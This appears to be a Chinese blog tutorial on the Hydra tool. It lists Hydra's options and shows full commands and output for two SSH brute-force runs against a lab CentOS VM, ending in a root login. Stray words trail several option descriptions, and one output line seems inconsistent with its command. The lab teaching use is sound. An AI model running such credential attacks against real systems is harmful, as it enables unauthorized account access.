Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。下面演示一下hydra的简单实用。
准备环节
1台centos虚拟机:IP192.168.xx.xx 账号root 密码1234(靶机)
1台kali虚拟机 (主机)
一份爆破用字典(账户爆破字典、密码爆破字典)
参数简介
hydra的主要选项
-R 修复以前使用的aborted/crashed session服务器
-S 执行SSL(Secure Socket Layer)链接session
-s Port 使用非默认服务器端口而是其余端口时,指定其端口并发
-l Login 已经获取登陆ID的状况下输入登陆IDssh
-L FILE 未获取登陆ID状况下指定用于暴力破解的文件(须要指出全路径)工具
-p Pass 已经获取登陆密码的状况下输入登陆密码线程
-P FILE 未获取登陆密码的状况下指定用于暴力破解的文件(须要指出全路径)code
-x MIN:MAX:CHARSET 暴力破解时不指定文件,而生能够知足指定字符集和最短、最长长度条件的密码来尝试暴力破解blog
-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式进程
-M FILE指定实施并列攻击的文件服务器的目录文件
-o FILE以STDOUT的形式输出结果值
-f 查找到第一个可使用的ID和密码的时候中止破解
-t TASKS 指定并列链接数(默认值:16)
-w 指定每一个线程的回应时间(Waittime)(默认值:32秒)
-4/6 指定IPv4/IPv6(默认值:IPv4)
-v/-V 显示详细信息
-U 查看服务器组件使用明细
实现环节
ssh默认是22号端口
可以看到,我桌面这里有一个爆破密码的文本kouling.txt和一个爆破用户名的文本name.txt,第一次演示的是已知用户名,不知道密码的情况下,所以只需要调用一个密码本kouling.txt就可以 ,在11行显示login: root password: 1234(爆破速度比较快)
第二次演示的是不知道用户名和密码的情况下,调用了两个文本,在倒数第8行显示login: root password: 1234(爆破速度很慢)
┌──(root💀kali)-[~/桌面]
└─# ls
kouling.txt name.txt
┌──(root💀kali)-[~/桌面]
└─# hydra -l root -P kouling.txt ssh://192.168.xx.xx:22/ 255 ⨯
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 17:54:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx login: root password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 17:54:14
┌──(root💀kali)-[~/桌面]
└─# hydra -L name.txt -P kouling.txt ssh://192.168.xx.xx:22/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-03 18:03:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2105 login tries (l:1/p:2105), ~132 tries per task
[DATA] attacking ssh://192.168.xx.xx:22/
[22][ssh] host: 192.168.xx.xx login: root password: 1234
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-03 18:03:48
┌──(root💀kali)-[~/桌面]
└─#
验证登录,可以看到由(root💀kali)变成[root@master ~]#,登录成功,登录过程中输入yes和密码就行了
┌──(root💀kali)-[~/桌面]
└─# ssh root@192.168.xx.xx
The authenticity of host '192.168.xx.xx (192.168.xx.xx)' can't be established.
ECDSA key fingerprint is SHA256:ZWvLiyQQ6RAcqo4qBrrmAlQhFEOR3psaP6NufbK8TLw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.xx.xx' (ECDSA) to the list of known hosts.
root@192.168.xx.xx's password:
Last login: Sun Oct 3 17:41:20 2021
[root@master ~]#